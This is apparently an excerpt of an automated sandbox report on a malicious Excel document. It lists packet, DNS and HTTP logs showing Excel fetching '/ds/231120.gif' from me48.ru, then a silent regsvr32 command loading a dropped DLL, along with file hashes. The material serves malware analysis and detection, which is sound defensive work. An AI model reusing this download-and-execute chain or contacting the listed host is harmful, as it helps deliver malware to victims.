    Nov 29, 2020 05:43:29.012782097 CET  49167        80         192.168.2.22   188.225.24.87
    Nov 29, 2020 05:43:29.621284008 CET  49167        80         192.168.2.22   188.225.24.87
    Nov 29, 2020 05:43:30.822590113 CET  49167        80         192.168.2.22   188.225.24.87
    Nov 29, 2020 05:43:33.225101948 CET  49167        80         192.168.2.22   188.225.24.87
    Nov 29, 2020 05:43:38.030380011 CET  49167        80         192.168.2.22   188.225.24.87
    Nov 29, 2020 05:43:47.640938044 CET  49167        80         192.168.2.22   188.225.24.87

    UDP Packets

    Timestamp                            Source Port  Dest Port  Source IP     Dest IP
    Nov 29, 2020 05:41:28.748198986 CET  52197        53         192.168.2.22  8.8.8.8
    Nov 29, 2020 05:41:28.833195925 CET  53           52197      8.8.8.8       192.168.2.22

    DNS Queries

    Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name     Type            Class
    Nov 29, 2020 05:41:28.748198986 CET  192.168.2.22  8.8.8.8  0x9610    Standard query (0)  me48.ru  A (IP address)  IN (0x0001)

    DNS Answers

    Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name     CName  Address        Type            Class
    Nov 29, 2020 05:41:28.833195925 CET  8.8.8.8    192.168.2.22  0x9610    No error (0)  me48.ru         188.225.24.87  A (IP address)  IN (0x0001)

    HTTP Request Dependency Graph

    • me48.ru

    HTTP Packets

    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
    0           192.168.2.22  49167        188.225.24.87   80                C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

    Timestamp                            kBytes transferred  Direction  Data
    Nov 29, 2020 05:41:28.911406040 CET  0                   OUT        GET /ds/231120.gif HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: me48.ru
        Connection: Keep-Alive
    Nov 29, 2020 05:41:29.961657047 CET  0                   IN         HTTP/1.1 200 OK
        Date: Sun, 29 Nov 2020 04:41:28 GMT
        Server: Apache/2.4.18 (Ubuntu)
        Content-Length: 0
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: image/gif


    Code Manipulations

    Statistics

    CPU Usage

    Memory Usage

    High Level Behavior Distribution

    Behavior

    System Behavior

    General

    Start time:05:41:38
    Start date:29/11/2020
    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Imagebase:0x13fea0000
    File size:27641504 bytes
    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:05:41:42
    Start date:29/11/2020
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Imagebase:0xff300000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    Code Analysis
